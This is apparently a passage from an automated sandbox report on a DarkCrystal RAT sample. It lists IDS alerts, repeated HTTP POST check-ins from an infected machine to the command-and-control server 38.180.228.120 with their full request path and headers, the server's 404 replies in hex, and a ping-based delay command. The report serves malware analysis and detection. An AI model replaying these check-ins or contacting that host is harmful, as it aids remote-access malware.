                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49987 -> 38.180.228.120:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49986 -> 38.180.228.120:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49984 -> 38.180.228.120:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49976 -> 38.180.228.120:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49991 -> 38.180.228.120:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49975 -> 38.180.228.120:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49990 -> 38.180.228.120:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49982 -> 38.180.228.120:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49978 -> 38.180.228.120:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49985 -> 38.180.228.120:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49977 -> 38.180.228.120:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49983 -> 38.180.228.120:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49981 -> 38.180.228.120:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49979 -> 38.180.228.120:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49989 -> 38.180.228.120:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49988 -> 38.180.228.120:80
                            Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49980 -> 38.180.228.120:80
                            Uses ping.exe to check the status of other devices and networks
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
                            Source: global trafficHTTP traffic detected: POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 38.180.228.120Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 38.180.228.120Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 38.180.228.120Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 38.180.228.120Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 38.180.228.120Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: 38.180.228.120Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 38.180.228.120Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 38.180.228.120Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 38.180.228.120Content-Length: 336Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 38.180.228.120Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 38.180.228.120Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 38.180.228.120Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 38.180.228.120Content-Length: 336Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: 38.180.228.120Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 38.180.228.120Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 38.180.228.120Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 38.180.228.120Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 38.180.228.120Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 38.180.228.120Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 38.180.228.120Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 38.180.228.120Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownTCP traffic detected without corresponding DNS query: 38.180.228.120
                            Source: unknownHTTP traffic detected: POST /cpu/Default4/externalrequestlinuxPoll/Track2image/BetterTest_linux/TrafficLocallowlongpoll/AsyncProvider/Uploads/providerpipepythonserverAsyncGeneratortrackdatalifeDlecdn.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 38.180.228.120Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:52:22 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:52:35 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:52:45 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 100 ContinueData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 31 39 20 4e 6f 76 20 32 30 32 34 20 31 37 3a 35 32 3a 35 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 36 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:52:59 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 19 Nov 2024 17:53:10 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 276Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 33 38 2e 31 38 30 2e 32 32 38 2e 31 32 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 38.180.228.120 Port 80</address></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 100 ContinueData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 31 39 20 4e 6f 76 20 32 30 32 34 20 31 37 3a 35 33 3a 32 33 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 36 0d 0a 4b 65 65 70 2d 41 6c 69 76 65 3a 20 74 69 6d 65 6f 75 74 3d 35 2c 20 6d 61 78 3d 31 30 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 